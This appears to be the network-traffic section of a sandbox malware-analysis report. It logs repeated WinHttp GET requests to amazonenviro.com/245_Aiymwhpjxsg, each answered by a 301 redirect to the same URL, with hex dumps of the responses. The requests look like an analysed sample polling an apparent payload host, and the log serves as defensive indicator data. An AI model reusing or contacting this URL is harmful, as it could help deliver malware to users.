                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:34.181060076 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:34.491100073 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:34 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:36.078697920 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:36.389172077 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:36 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:37.977544069 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:38.288398027 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:38 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:39.946317911 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:40.257287025 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:40 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:41.866827011 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:42.177628040 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:42 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:43.760250092 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:44.070542097 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:43 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:45.665513039 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:45.975619078 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:45 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:47.579757929 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:47.890016079 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:47 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:49.471590996 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:49.781872034 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:49 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:51.396368980 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:51.707931042 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:51 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:53.312959909 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:53.627576113 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:53 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:55.222234964 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:55.532463074 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:55 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:57.192383051 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:57.502397060 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:57 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:59.107225895 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:59.417500973 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:59 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
